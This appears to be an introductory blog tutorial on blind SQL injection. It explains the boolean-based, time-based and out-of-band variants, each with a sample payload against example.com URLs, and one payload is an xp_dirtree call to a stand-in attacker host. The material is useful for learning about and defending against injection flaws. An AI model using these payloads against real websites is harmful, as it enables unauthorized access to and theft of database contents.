Blind SQL Injection: Introduction


SQL injection is one of the most deadliest attack in the world of Internet. It tops the OWASP top 10. I have already written about the Basic SQL Injection attack. If you haven’t seen those articles, here is the link:

http://www.anonhack.in/2015/09/sql-injection-part-1/

http://www.anonhack.in/2016/01/sql-injection-the-guide/

http://www.anonhack.in/2017/06/sql-injection-part-3-identifying-string-or-numeric/

http://www.anonhack.in/2018/04/sql-injection-part-4getting-admin-password/

The above links are the guides to do Error based Reflective SQL Injection and how you can identify the column for reflecting values.

This article is all about Blind SQL Injection.

Let’s jot down some key points before we start:

The Blind SQL Injection is totally like a guessing game.

It is time consuming as compared to Error based SQL Injection.

In Blind SQL Injection, the attack results is reflected in the form of improper loading of the page or via another channel.

There is no way you see the output of the table content with the query like in error based SQLi because Blind SQLi works with only True or False.

Type of Blind SQL Injection:

  1. Boolean based Blind SQLi
    The boolean based blind sqli works like boolean yes or no/True or False. With the Boolean, it means the content on the website of a particular field will load correctly, if the query that you put exist in database or else it will not load.
    Example:
    www.example.com/site.php?id=2  –> This will load the page for id=2 correctly.
    www.example.com/site.php?id=2′ AND 1=1# –> This query should load the page for id=2 correctly because 1=1 is always true.
    www.example.com/site.php?id=2′ AND 1=2# –>This query would not load id=2 page because 1=2 is false.There are more than one way to write the above query. Sometimes ‘ AND 1=1# works without the quote. You should always try different ways.


     

  2. Time Based SQL Injection
    It is time based interaction with the website. If the website takes time to respond when you put a query then the site is vulnerable to time based SQLi. Sleep function is used to carry out Time based SQLi. When you put a query, you put it with sleep function and set the timing, If the website loads in that time, then you can carry out Time based SQLi on that website.
    There is a time delay with Blind SQLi.
    The time based SQLi is used when the Boolean way doesn’t work, because when you put the Boolean based query and you do not see any changes on the page reflected like a picture missing or content hasn’t loaded the way it should be then we go for Time based SQLi.
    Example: www.example.com/site.php?id=1; waitfor delay ‘0:0:5’–       #—>This is a MS SQL query.
    or
    www.example.com/site.php?id=1 and if(1=1, sleep(10), false) —


     

  3.  Out of band Blind SQLi
    In this type of attack, the Channel is out of band, that means the victim website is not exactly where we see results but it is the attackers logs where we can see the results. Quit confusing, but the channel here is out of band i.e the attackers own server.
    Example: www.example.com/site.php?id=1;EXEC master..xp_dirtree ‘\\notvictim.attacker.com\’ This above query will execute on the victim’s website but it will produce an output on the server notvictim.attacker.com.

 

I will provide example for each form of Blind SQLi in the upcoming articles and put the links in this article to make it easier for you to see.


Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.